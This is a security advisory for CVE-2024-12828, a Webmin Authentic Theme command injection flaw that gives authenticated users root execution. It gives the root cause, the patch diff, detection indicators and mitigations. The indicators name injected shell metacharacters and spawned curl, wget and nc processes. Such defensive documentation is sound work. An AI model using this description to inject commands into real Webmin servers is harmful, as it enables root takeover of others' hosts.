CVE-2024-12828 Overview
CVE-2024-12828 is a command injection vulnerability in Webmin that allows authenticated remote attackers to execute arbitrary code as root. The flaw resides in the handling of CGI requests within the Authentic Theme component. Webmin fails to properly validate a user-supplied string before passing it to a system call, enabling shell command injection [CWE-78]. The Zero Day Initiative tracked this issue as ZDI-CAN-22346 and published advisory ZDI-24-1725. Webmin version 2.104 is confirmed affected.
Critical Impact
Authenticated attackers can achieve root-level remote code execution on affected Webmin installations, gaining full control of the underlying Linux or Unix host.
Affected Products
- Webmin 2.104
- Webmin Authentic Theme (vulnerable authentic-lib.pl autocomplete handler)
- Webmin deployments exposing the management interface over the network
Discovery Timeline
- 2024-12-30 - CVE-2024-12828 published to NVD
- 2025-08-14 - Last updated in NVD database
Technical Details for CVE-2024-12828
Vulnerability Analysis
The vulnerability is an OS command injection flaw [CWE-78] in Webmin's CGI request handling. When the Authentic Theme processes the xhr-get_autocompletes request, it passes user-controlled parameters to a function that ultimately invokes a system shell call. Because the input string is not sanitized or escaped, an attacker who supplies crafted shell metacharacters can break out of the intended argument context. The resulting command executes with the privileges of the Webmin process, which typically runs as root. Successful exploitation grants the attacker arbitrary command execution on the host.
Exploitation requires valid authentication to the Webmin interface, which limits opportunistic attacks but does not prevent abuse by low-privileged users, compromised accounts, or attackers who have obtained credentials through phishing or credential reuse. The EPSS score of 21.7% places this CVE in the 95th percentile, indicating elevated likelihood of exploitation activity relative to the broader CVE population.
Root Cause
The root cause is missing input validation in the autocomplete handler within authentic-lib.pl. The get_autocomplete_shell function processed xhr-get_autocomplete_type and xhr-get_autocomplete_string parameters and used them to execute a system call without first dropping privileges or sanitizing shell metacharacters.
Attack Vector
An authenticated attacker sends a crafted HTTP request to the Webmin CGI endpoint that handles autocomplete queries. By injecting shell metacharacters such as backticks, semicolons, or command substitution syntax into the autocomplete parameters, the attacker forces the server to execute attacker-controlled commands as root.
// Security patch in authentic-lib.pl - adds privilege drop before autocomplete execution
flush_file_lines($file);
print convert_to_json($history);
} elsif ($in{'xhr-get_autocompletes'} eq '1') {
+ switch_to_remote_user_safe();
my @data =
get_autocomplete_shell($in{'xhr-get_autocomplete_type'}, $in{'xhr-get_autocomplete_string'});
print convert_to_json(\@data);
Source: Webmin Authentic Theme commit 61e5b10. The patch introduces a call to switch_to_remote_user_safe() before invoking get_autocomplete_shell, ensuring the shell command runs under the authenticated user's context rather than as root.
Detection Methods for CVE-2024-12828
Indicators of Compromise
- HTTP POST requests to Webmin endpoints containing xhr-get_autocompletes=1 accompanied by shell metacharacters (;, |, `, $()) in xhr-get_autocomplete_type or xhr-get_autocomplete_string parameters.
- Unexpected child processes spawned by the miniserv.pl Webmin daemon, such as sh, bash, curl, wget, or nc.
- New cron entries, SSH keys, or user accounts created shortly after Webmin authentication events.
Detection Strategies
- Inspect Webmin access logs at /var/webmin/miniserv.log for autocomplete requests containing non-alphanumeric payloads.
- Monitor process ancestry on Webmin hosts to identify shell invocations descending from the Webmin Perl process.
- Correlate authentication events with subsequent process creation to flag command-injection patterns following legitimate logins.
Monitoring Recommendations
- Forward Webmin web logs and Linux audit logs to a centralized SIEM for cross-source correlation.
- Alert on outbound network connections initiated by child processes of miniserv.pl.
- Track file integrity on /etc/passwd, /etc/shadow, ~/.ssh/authorized_keys, and crontabs on Webmin servers.
How to Mitigate CVE-2024-12828
Immediate Actions Required
- Upgrade Webmin to a version later than 2.104 that includes the Authentic Theme patch from commit 61e5b10.
- Restrict access to the Webmin management interface (default TCP port 10000) to trusted administrative networks only.
- Audit Webmin user accounts and rotate credentials for any account that may have been used by untrusted parties.
Patch Information
The fix is delivered in the Authentic Theme via commit 61e5b10227b50407e3c6ac494ffbd4385d1b59df, which adds a switch_to_remote_user_safe() call before the autocomplete shell invocation. Additional details are available in the Zero Day Initiative Advisory ZDI-24-1725.
Workarounds
- Place the Webmin interface behind a VPN or IP allowlist to eliminate exposure to untrusted networks.
- Disable or restrict the autocomplete functionality in the Authentic Theme until patches can be applied.
- Enforce strong, unique credentials and multi-factor authentication on all Webmin accounts to reduce the risk of authenticated exploitation.
# Configuration example - restrict Webmin access via iptables to a trusted management subnet
iptables -A INPUT -p tcp --dport 10000 -s 10.0.0.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 10000 -j DROP
# Verify Authentic Theme version after patching
grep -R "switch_to_remote_user_safe" /usr/share/webmin/authentic-theme/authentic-lib.pl
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
